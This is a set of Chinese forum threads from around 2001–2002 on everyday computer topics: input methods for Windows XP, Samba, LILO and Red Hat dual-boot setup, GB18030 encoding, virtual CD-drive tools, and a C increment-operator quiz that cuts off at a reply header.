计算机技术
在windowsxp中有什么好的中文输入法么？

上一贴 | 下一贴
发表人 主题: 在windowsxp中有什么好的中文输入法么？
西门吹牛

终级用户
积分：692
发帖：281
来自：杭州
注册：2000-09-29
 发表于 2001-12-26 09:45:47 按此观看西门吹牛的个人资料 按此发邮件给西门吹牛 收藏该主题供以后查看 发送悄悄话给西门吹牛 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看西门吹牛的IP
紫光拼音输入法好像不支持xp。搞得我现在上网只有写英文了。

我将一直寻找下去......
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-26 12:22:51 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
微软拼音3.0是个好东西~ ~我从紫光改用这个的~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

嘿嘿

坏笑
积分：403
发帖：525
来自：
注册：2001-10-06
 发表于 2001-12-26 13:20:23 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
不会呀，我现在在XP里一直用的就是紫光，没发现什么问题呀，挺好用的。

缘是天定,份在人为.
西门吹牛

终级用户
积分：692
发帖：281
来自：杭州
注册：2000-09-29
 发表于 2001-12-26 13:23:07 按此观看西门吹牛的个人资料 按此发邮件给西门吹牛 发送悄悄话给西门吹牛 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看西门吹牛的IP
不会吧！那怎么装啊！紫光那个版本的。我怎么不会出现在底下。按ctrl+shift,一点反应都没有。

我将一直寻找下去......
Bee007

高级用户
积分：193
发帖：223
来自：
注册：2000-02-01
 发表于 2001-12-26 17:36:11 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
主要是语言工具栏的问题，控制版面里头，时间、日期、语言那里乱来调整一下。
freedog

初级用户
积分：0
发帖：21
来自：
注册：2001-12-14
 发表于 2001-12-26 18:46:30 按此观看freedog的个人资料 按此发邮件给freedog freedog 的 oicq 是108336337,查看 108336337 的资料 发送悄悄话给freedog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看freedog的IP
智能abc多好！有简单有好用！占资源还少！

I am a freedog！
JILL

终级用户
积分：575
发帖：175
来自：沈阳市
注册：2001-12-10
 发表于 2001-12-26 21:22:24 按此观看JILL的个人资料 按此发邮件给JILL JILL 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给JILL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看JILL的IP
王码五笔型输入法86版

誓与WIN2000共存
xqlyg

超级用户
积分：366
发帖：93
来自：china
注册：2002-02-07
 发表于 2002-02-07 16:38:35 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP
abc 很好用而且还小
dancing

叶恨花
现任版主
积分：4724
发帖：2226
来自：|二进制情感天空|
注册：2000-12-11
 发表于 2002-02-07 16:39:58 按此观看dancing的个人资料 按此发邮件给dancing 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP
智能狂拼2,我一直用它,挺好的.

情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… …

Blueidea Web Team
Moderator Of Photoshop & Imagerady Forum

话草

终级用户
积分：629
发帖：197
来自：
注册：2001-08-07
 发表于 2002-02-07 17:08:42 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
紫光拼音输入法2.3 Foundation

各人习惯不同 ;)

51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-02-07 17:14:23 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP

如果用五笔,我推荐用五笔加加

http://202.102.4.31/51windows/soft/wbjj.exe

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

上一贴 | 下一贴
快速回复 | 主题：在windowsxp中有什么好的中文输入法么？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


在LINUX中如何看局域网中WINDOWS机器上的东西?

计算机技术
在LINUX中如何看局域网中WINDOWS机器上的东西?

上一贴 | 下一贴
发表人 主题: 在LINUX中如何看局域网中WINDOWS机器上的东西?
cjj31

方与圆
积分：2971
发帖：1044
来自：浙江嘉兴
注册：2000-07-05
 发表于 2001-12-06 19:32:59 按此观看cjj31的个人资料 按此发邮件给cjj31 cjj31 的 oicq 是7777435,查看 7777435 的资料 收藏该主题供以后查看 发送悄悄话给cjj31 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cjj31的IP
需要装个什么东东?

怎么配置?

我笨故我菜！

好好学习，天天向上!

CrazyParty

群山之巅
积分：2164
发帖：811
来自：温州
注册：2000-10-14
 发表于 2001-12-07 08:53:39 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
Samba服务

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
cjj31

方与圆
积分：2971
发帖：1044
来自：浙江嘉兴
注册：2000-07-05
 发表于 2001-12-08 21:19:12 按此观看cjj31的个人资料 按此发邮件给cjj31 cjj31 的 oicq 是7777435,查看 7777435 的资料 发送悄悄话给cjj31 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cjj31的IP
说详细点好吗？

不要只将半句!

我笨故我菜！

好好学习，天天向上!

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-08 21:43:38 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
cjj31在上个帖子中说
引用:
说详细点好吗？

不要只将半句!

http://www.ccidnet.com/tech/os/2001/05/14/58_2146.html

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 | 主题：在LINUX中如何看局域网中WINDOWS机器上的东西?
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


Win2000的错还是什么的错？

计算机技术
Win2000的错还是什么的错？

上一贴 | 下一贴
发表人 主题: Win2000的错还是什么的错？
DW5

阻击之眼
积分：2678
发帖：2517
来自：blueidea
注册：2001-07-29
 发表于 2001-12-24 14:08:47 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 收藏该主题供以后查看 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
输入法经常乱，经常把紫光作为默认输入法！！哪位有办法锁定那两个键值？？还是有什么办法解决！一切都是在安装OfficeXP后发生的！可是又不能不安装！！

永远走在时代的最前端。。。

Blueidea Cs Team
Team Nicker
-]Blueidea[- Y.DW5

巍笑

Vshine
积分：1621
发帖：993
来自：江西南昌
注册：2001-11-16
 发表于 2001-12-24 14:15:29 按此观看巍笑的个人资料 按此发邮件给巍笑 访问巍笑的主页 巍笑 的 oicq 是419098,查看 419098 的资料 发送悄悄话给巍笑 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看巍笑的IP
点控制面板里的输入法调整一下，实在不行,用优化大师里的输入法调整.
http://hnftp.soft163.com/wom.zip

Necromancer of Might and Magic
DW5

阻击之眼
积分：2678
发帖：2517
来自：blueidea
注册：2001-07-29
 发表于 2001-12-25 13:09:19 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
用一次Win2000就用魔术兔子设置一次！！都累死了

永远走在时代的最前端。。。

Blueidea Cs Team
Team Nicker
-]Blueidea[- Y.DW5

赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-12-25 13:47:09 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
很简单哦

你添加一个美国英语输入法
然后在“默认语言”中选择美国英语就好了

同时你可以删除中文键盘

Office XP会改变输入法显示方式
在Win2000下很不爽

你下次安装Office XP
记得自定义安装
在列表中淘汰“中文输入法”就好了

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
DW5

阻击之眼
积分：2678
发帖：2517
来自：blueidea
注册：2001-07-29
 发表于 2001-12-25 19:38:10 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
谢谢赵鹏兄！

永远走在时代的最前端。。。

Blueidea Cs Team
Team Nicker
-]Blueidea[- Y.DW5

POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2002-01-10 11:22:11 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
赵鹏在上个帖子中说
引用:
很简单哦

你添加一个美国英语输入法
然后在“默认语言”中选择美国英语就好了

同时你可以删除中文键盘

Office XP会改变输入法显示方式
在Win2000下很不爽

你下次安装Office XP
记得自定义安装
在列表中淘汰“中文输入法”就好了

赵鹏同志，你说的在列表中淘汰“中文输入法”是不是---Office Shared Feature里的Alternative User Input？把他改成Not Available就可以了？

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

数码狂人

终级用户
积分：1337
发帖：369
来自：只有数字的世界
注册：2001-09-30
 发表于 2002-01-10 19:41:40 按此观看数码狂人的个人资料 按此发邮件给数码狂人 访问数码狂人的主页 数码狂人 的 oicq 是1478222,查看 1478222 的资料 发送悄悄话给数码狂人 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看数码狂人的IP
建议安装陈桥五笔。

我始终相信，自己是优秀的，但并不是最优秀的。所以我努力、用心，用心做好每件事……
樱

终级用户
积分：1308
发帖：401
来自：▓★☆★☆★▓
注册：2000-12-11
 发表于 2002-01-11 14:46:17 按此观看樱的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给樱 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看樱的IP
数码狂人在上个帖子中说
引用:
建议安装陈桥五笔。

五笔？
还是紫光的好。

18J
[w]
上一贴 | 下一贴
快速回复 | 主题：Win2000的错还是什么的错？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


我再贴一次！！！

计算机技术
我再贴一次！！！

上一贴 | 下一贴
发表人 | 主题: 我再贴一次！！！
破孩 初级用户 积分：143 发帖：53 来自： 注册：2001-10-05 | 发表于 2002-01-05 12:37:31 按此观看破孩的个人资料 该用户不允许显示它的电子邮件 访问破孩的主页 收藏该主题供以后查看 发送悄悄话给破孩 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看破孩的IP 请问，怎么装 Lilo ?
大哥 超级用户 积分：318 发帖：111 来自： 注册：2001-12-20 | 发表于 2002-01-05 13:24:28 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP 直接运行lilo即可，前提是能进入Linux，所以启动软盘是很重要的！ 老哥我知道的就这么多了。
大哥 超级用户 积分：318 发帖：111 来自： 注册：2001-12-20 | 发表于 2002-01-05 13:37:49 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP 呵呵，补充说明： LILO有两种安装方式，一种是装在MBR上，这会被WinXP破坏（因为Boot Loader也要装在这里），因此你需要先准备Linux启动软件（/sbin/mkbootdisk），然后可以放心地安装XP，分区时注意点不要破坏了Linux的分区。 装完后应该是Linux无法启动了，此时用启动软盘启动，进入Linux后，运行lilo即可。 不行的话可能需要vi /etc/lilo.conf，改一下分区的名称，因为可能XP会造成分区改变。 另外一种就是装在Linux分区的首扇区上，这样Lilo就不会遭到破坏了。安装完XP后，用Fdisk改变启动分区为Linux分区即可。 老哥我知道的就这么多了。
上一贴 | 下一贴
快速回复 | 主题：我再贴一次！！！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


装过REDLINUX 7。2的都给我进来！！

计算机技术
装过REDLINUX 7。2的都给我进来！！

上一贴 | 下一贴
发表人 主题: 装过REDLINUX 7。2的都给我进来！！
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2002-01-14 17:13:23 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 收藏该主题供以后查看 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
偶今天装REDLINUX7。2，是第一次安装碰到了一点小麻烦

我的机器先安装了WIN2K的，硬盘IBM40G！我在WIN2K下专门腾出一个FAT32格式的6G大小的分区给LINUX，就是分区的时候不知道该动哪了！ 看了半天的说明书还是看不明白……怎么办呀，我是选自动还是手动还是在LINUX分区呀？？？如何弄那东西呢？

PS：我都切换好几次了没次都没安装成功，好烦躁

^^
bigboy

初级用户
积分：52
发帖：19
来自：
注册：2001-02-21
 发表于 2002-01-15 09:05:38 按此观看bigboy的个人资料 按此发邮件给bigboy 发送悄悄话给bigboy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bigboy的IP
我的机器是win2000pro，可是我安装成功了！双系统并存。
步骤很简单，先用分区软件给linux创造ex2分区和swap交换分区，然后用linux启动盘启动，在选择安装时用“已经存在的分区，重新格式化安装”系统会自动安装的，对原来的windows没有任何影响！
祝你好运！
ldh2001@hotmail.com
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-01-15 09:44:13 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP

你先找象pqmagic分区大师这样的硬盘工具，把你预留出来的那个区删掉，然后用linux的安装盘启动，安装程序就会显示你机子上可利用的空间，接着就按说明书上做就是了，这里有几点需要提醒的是：

1、用pqmagic删除分区后不用把分区再格式化成ext2格式的，redhad安装程序里的分区工具自己会做，而且应该做得比pq好。

2、仔细看说明书上关于分区的部分，上面详细的说明你应该怎样设定linux的分区，对于初次安装linux的，可以考虑就分两个区:交换区和根区。先建立交换区，大小设为130M,然后把剩下的空间都设为根区（\）.事实上想你这样的大空间建立象 /user 这样的分区是挺有必要的，等你以后用熟了可以考虑多分几个区。

3、如果使用其他的linux安装程序，一般会有让你选择自动安装还是自定义安装，如果你想在你的机子保留双 操作系统，就一定要选择自定义安装，如果选择自动安装，你整个硬盘就会全部格成ext2格式的，到时真是欲哭无泪呀（我有过这样的经历，两年多的数据呀 [image] ）

因为你的另一个系统是2000，可能还会遇到一些问题，你可以看看这里：
http://www.blueidea.com/bbs/NewsDetail.asp?id=290111

Blueidea Web Team.
Moderator Of Computer Technology Forum
cjj31

方与圆
积分：2971
发帖：1044
来自：浙江嘉兴
注册：2000-07-05
 发表于 2002-01-15 20:54:04 按此观看cjj31的个人资料 按此发邮件给cjj31 cjj31 的 oicq 是7777435,查看 7777435 的资料 发送悄悄话给cjj31 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cjj31的IP
把FAT32的分区，格成FAT的应该能装！
或者用PQ建个LINUX的分区，再建个LINUX SWAP区

还有你的分区要主分区，逻辑分区装不起来！

hda1:硬盘的第一个主分区
hda2:...........二............

我笨故我菜！

好好学习，天天向上!

上一贴 | 下一贴
快速回复 | 主题：装过REDLINUX 7。2的都给我进来！！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


中文编码标准，GB18030标准（转贴）

计算机技术
中文编码标准，GB18030标准（转贴）

上一贴 | 下一贴
发表人 主题: 中文编码标准，GB18030标准（转贴）
cjj31

方与圆
积分：2971
发帖：1044
来自：浙江嘉兴
注册：2000-07-05
 发表于 2002-01-18 20:30:14 按此观看cjj31的个人资料 按此发邮件给cjj31 cjj31 的 oicq 是7777435,查看 7777435 的资料 收藏该主题供以后查看 发送悄悄话给cjj31 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cjj31的IP
出处 http://www.xteamlinux.com.cn/article.php?sid=72

Linux的中文化是Linux真正在中国获得应用首先需要解决的问题。从Xteam推出世界上第一个中文Linux开始，中文化走过了本地化（Localization, L10N）到国际化(Internationalization, I18N)的发展路程，现在已经推出了可以流畅处理中文的Linux产品。
本地化，即L10N要解决的问题是如何将系统中的其它语言的信息转变为本地的文字。对于Linux而言，就是要让应用程序的界面、提示信息变成中文。国际化，即I18N解决的问题则是如何透明地处理各种语言文字，在不需要对应用程序做改动的前提下，能够显示、输入、处理各种语言。目前，I18N是解决世界上各种语言的处理的最好方式。

在Linux上实现I18N，所要做的工作是：
* 使Linux核心支持I18N
* 使glibc支持I18N。
glibc是Linux系统中最底层的支持软件，通过glibc中提供的locale机制，应用程序能够实现I18N。
* 使XWindow支持I18N。
Xwindow是Linux下最常用的图形界面系统，它采用了Xlocale机制为应用程序提供I18N支持。
* 使其它应用程序如Java、Mozilla支持I18N。Java、Mozilla等跨平台应用提供自己的I18N支持。

目前，除了Linux核心仍然不能进行各种语言文字的显示和输入，其它的部分能够比较好的支持I18N。

除了I18N，另一个影响Linux中文信息处理的关键是中文信息编码。在中国，中文信息编码由政府负责制定并监督实施。这是为了保证对于所有的系统中文的编码都是一致的，能够互相进行操作。从计算机的应用开始，我国已经颁布了多种中文信息编码标准，常用的是GB2312-1980，GB12345，GB13000（GBK），以及最新标准GB18030。值得一提的是，最新的GB18030标准将要作为强制标准实行，所有不支持GB18030标准的软件将不能作为产品出售。

从GB2312-1980编码开始，汉字都是采用双字节编码。为了与系统中基本的ASCII字符集区分开，所有汉字编码的每个字节的第一位都是1。例如：“啊”字的编码为0xB0A1。GB2312的汉字编码规则为：第一个字节的值在0xB0到0xF7之间，第二个字节的值在0xA0到0xFE之间。GB12345和GB13000是对GB2312-1980的扩充，所有已经包含在GB2312中的汉字编码不变，另外增加更多的码位。其编码规则大致为：第一个字节的值在0x81到0xFE之间，第二个字节的值在0x40到0xFE之间。由于GB13000是对GB2312的扩展，所以也被成为GBK。

GB18030也是对GB2312的扩展，其编码长度由2个字节变为1~4个字节。其中包括： * 单字节，其值从0到0x7F
* 双字节，第一个字节的值从0x81到0xFE，第二个字节的值从0x40到0xFE（不包括0x7F）
* 四字节，第一个字节的值从0x81到0xFE，第二个字节的值从0x30到0x39，第三个字节的值从0x81到0xFE，第四个字节的值从0x30到0x39。

可以看出，GB18030的容量非常大，共有码位160万左右。另外，它与GB13000标准是兼容的。因此，所有基于GB13000设计的软件都能够不经修改运行在支持GB18030的系统平台上。

在Linux系统中，由于GB18030标准的复杂性，实现GB18030标准有一定的困难。但是，幸运的是，在广大Linux开发者的共同努力下，现在的Linux系统已经基本实现了GB18030标准：
* 在glibc中，已经有了GB18030的locale以及处理程序，应用程序可以正确识别并处理GB18030编码。
* 对于Xwindow，目前还没有Xfree86组织正式发布的GB18030支持。但是国内厂家已经积极的参加了其中的工作。例如，在最新的XteamLinux4.0中，不但包括了支持GB18030的Xwindow系统，常用的KDE和GNOME系统目前也已经支持GB18030。在KDE中甚至可以直接将GB18030的文件打印出来。另外，XteamLinux4.0中还包括了最新的支持GB18030的中文输入法。
* 其它应用程序方面，由于Java的代码相对封闭，对于GB18030的支持还不清楚。但是由于Java内部采用Unicode作为编码，支持GB18030应该不成问题。Mozilla的GB18030支持采用了自己的专有方式：将GB18030分为2字节和4字节两种编码，分别加以支持。但是它的这种支持方式还需要一些额外的程序配合。目前，XteamLinux4.0中的Mozilla已经能够正确处理GB18030编码，例如自动显示一个GB18030编码的网页。

关于GB18030的实现其实包含了许多的细节，更多详细的内容可以参考GB18030标准文本:
GB18030_Summary.pdf

我笨故我菜！

好好学习，天天向上!

上一贴 | 下一贴
快速回复 | 主题：中文编码标准，GB18030标准（转贴）
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


大家都用什么虚拟光驱软件？

计算机技术
大家都用什么虚拟光驱软件？

上一贴 | 下一贴
发表人 主题: 大家都用什么虚拟光驱软件？
肖天

超级用户
积分：347
发帖：90
来自：黑龙江省
注册：2001-06-28
 发表于 2002-01-20 08:05:43 按此观看肖天的个人资料 按此发邮件给肖天 访问肖天的主页 肖天 的 oicq 是44351669,查看 44351669 的资料 收藏该主题供以后查看 发送悄悄话给肖天 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看肖天的IP
大家都用什么虚拟光驱软件？我用光驱魔术师这个软件用时非常愿意死机，其他的虚拟光驱软件也用类似的情况，怎样处理？

good good study ,day day up!
arrive

终级用户
积分：1231
发帖：410
来自：大连
注册：2000-12-02
 发表于 2002-01-20 10:50:53 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
东方光驱魔术师，最好的
我看过评测，速度很快！

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
yesbest

初级用户
积分：131
发帖：34
来自：宿州，安徽，中国
注册：2002-01-20
 发表于 2002-01-20 11:25:48 按此观看yesbest的个人资料 按此发邮件给yesbest 访问yesbest的主页 yesbest 的 oicq 是9099711,查看 9099711 的资料 发送悄悄话给yesbest 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yesbest的IP
东方光驱魔术师是一个不错的软件，评测市场上这个软件也不错，
虚拟光驱也不错，不过需要注册，不过我首选的也是光驱魔术师，
你的计算机用光驱魔术师死机，你检查一下你的机器的DirectX配置，可能你的是DirectX8.0了，最佳的配置是DirectX7.0
你检查一下，或者硬盘里面有坏道，
如果运行任何程序都死机的话，就要检查一下你的机器的清洁问题和碎片了，

kelvinfeel@163.com
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-01-20 15:38:25 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
我的硬盘小,没有用过

用的时候,就把光盘整个复制过去!多数时候效果一样,有时候更好,
有时候也不行~

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

肖天

超级用户
积分：347
发帖：90
来自：黑龙江省
注册：2001-06-28
 发表于 2002-01-20 18:29:22 按此观看肖天的个人资料 按此发邮件给肖天 访问肖天的主页 肖天 的 oicq 是44351669,查看 44351669 的资料 发送悄悄话给肖天 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看肖天的IP
谢谢几位的解答，能不能是我压缩的光盘是加密的原因呢？

good good study ,day day up!
天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2002-01-20 19:13:35 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
肖天在上个帖子中说
引用:
大家都用什么虚拟光驱软件？我用光驱魔术师这个软件用时非常愿意死机，其他的虚拟光驱软件也用类似的情况，怎样处理？

我也是，不但死机，而且让机子的速度大大减慢，用几天就不用了！

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
goldgoat

金山羊
现任版主
积分：2543
发帖：622
来自：济南.currentfr
注册：2001-03-21
 发表于 2002-01-20 19:15:57 按此观看goldgoat的个人资料 按此发邮件给goldgoat goldgoat 的 oicq 是23289040,查看 23289040 的资料 发送悄悄话给goldgoat 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看goldgoat的IP
还是daemon结合winiso最好用

flash不精不敢来！
www.currentframe.com

Blueidea Web Team
Moderator Of Flash Action forum

巍笑

Vshine
积分：1621
发帖：992
来自：江西南昌
注册：2001-11-16
 发表于 2002-01-20 19:34:21 按此观看巍笑的个人资料 按此发邮件给巍笑 访问巍笑的主页 巍笑 的 oicq 是419098,查看 419098 的资料 发送悄悄话给巍笑 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看巍笑的IP
怎么结合？
ＤＡＥＭＯＮ具体怎么用？有没教程？：）

Necromancer of Might and Magic
len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2002-01-21 07:54:49 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
用过虚拟光驱6.0,感觉很好,没有出现过什么问题.

Dripping water wears away a stone.
上一贴 | 下一贴
快速回复 | 主题：大家都用什么虚拟光驱软件？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


一个C的小问题

计算机技术
一个C的小问题

上一贴 | 下一贴
发表人 主题: 一个C的小问题
梅友酷子

初级用户
积分：70
发帖：28
来自：
注册：2001-10-08
 发表于 2001-12-18 16:02:20 按此观看梅友酷子的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给梅友酷子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看梅友酷子的IP
如果int =3；则k=（i++)+(++i)+(i++)执行过后k的值为_____，i的值为_____
答案是12，6
如果int =3；则k=（++i)+(++i)+(++i)执行过后k的值为_____，i的值为_____
答案是18，6
谁能解答一下具体的操作步骤

POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
